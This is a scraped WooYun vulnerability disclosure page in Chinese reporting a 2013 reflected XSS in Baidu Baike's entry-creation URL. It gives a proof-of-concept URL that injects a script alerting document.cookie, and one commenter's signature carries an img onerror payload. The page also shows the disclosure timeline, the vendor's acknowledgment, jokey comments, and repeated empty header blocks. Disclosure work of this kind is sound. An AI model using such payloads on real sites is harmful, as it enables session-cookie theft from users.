百度百科反射xss可以获取cookie | wooyun-2013-032240| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-032240

漏洞标题：百度百科反射xss可以获取cookie

漏洞作者： D＆G

提交时间：2013-07-25 12:53

修复时间：2013-09-08 12:53

公开时间：2013-09-08 12:53

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-07-25：细节已通知厂商并且等待厂商处理中
2013-07-26：厂商已经确认，细节仅向厂商公开
2013-08-05：细节向核心白帽子及相关领域专家公开
2013-08-15：细节向普通白帽子公开
2013-08-25：细节向实习白帽子公开
2013-09-08：细节向公众公开

简要描述：

想要把漏洞描述写的好一点，回顾了一下百度以前的xss，貌似都是已从其他渠道获悉。。。

详细说明：

http://baike.baidu.com/create/%27%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cimg%3E%27%27%27%27&enc=gbk
在创建词条处插入XSS代码。
测试浏览器：firefox 17.0.5

漏洞证明：

修复方案：

不专业不敢乱说

版权声明：转载请注明来源 D＆G@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：4

确认时间：2013-07-26 15:30

厂商回复：

感谢反馈，我们正在联系业务部门处理！

漏洞评价：

2013-07-25 12:56 | 熊猫 ( 实习白帽子 | Rank:64 漏洞数:33 | panda)

碉堡
2013-07-25 14:10 | Ki11 ( 路人 | Rank:26 漏洞数:5 | ส็็็็็็็็็็็็็็็็็็็...)

屌炸
2013-07-25 14:20 | 国士无双 ( 路人 | Rank:5 漏洞数:5 | 小伙伴都惊呆了...)

我和我的小伙伴们都惊呆了
2013-07-25 14:24 | tzrj ( 实习白帽子 | Rank:87 漏洞数:24 | 1111)

我和我的小伙伴们都惊呆了
2013-07-25 14:31 | D＆G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

我的小伙伴们都惊呆了
2013-07-25 14:51 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

我和我的小伙伴们都惊呆了
2013-07-25 19:49 | dtc ( 路人 | Rank:10 漏洞数:1 | 业余技术爱好者，来乌云学习。)

我和我的小伙伴们都惊呆了
2013-07-26 10:45 | 小杨 ( 路人 | Rank:22 漏洞数:4 | 。)

我和我的小伙伴们都惊呆了
2013-07-26 15:05 | ‭‭‭‭ ( 路人 | Rank:20 漏洞数:8 )

@dtc 我和我的小伙伴们都惊呆了。。
2013-07-26 17:17 | 顺疯快帝 ( 路人 | Rank:2 漏洞数:1 | chong.qq.com/home/payment.shtml)

我和我的小伙伴们都惊呆了
2013-07-26 18:52 | 有妹子送上 ( 实习白帽子 | Rank:89 漏洞数:28 | 杭州最帅的男人)

我和我的小伙伴们都惊呆了
2013-07-26 22:53 | ufohacker ( 路人 | Rank:3 漏洞数:1 | 提高的是能力不是技术！)

我和我的小伙伴们都精袋了
2013-09-08 13:05 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

我和我的小伙伴们都精袋了4分，神马情况
2013-09-09 13:47 | Anonymous.Antisec ( 实习白帽子 | Rank:48 漏洞数:8 | We are anonymous.)

感谢您对百度的支持，我们已从其他渠道获悉。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-032240

漏洞标题：百度百科反射xss可以获取cookie

相关厂商：百度

漏洞作者： D＆G

提交时间：2013-07-25 12:53

修复时间：2013-09-08 12:53

公开时间：2013-09-08 12:53

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 D＆G@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-032240

漏洞标题：百度百科反射xss可以获取cookie

相关厂商：百度

漏洞作者： D＆G

提交时间：2013-07-25 12:53

修复时间：2013-09-08 12:53

公开时间：2013-09-08 12:53

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-032240"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 D＆G@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：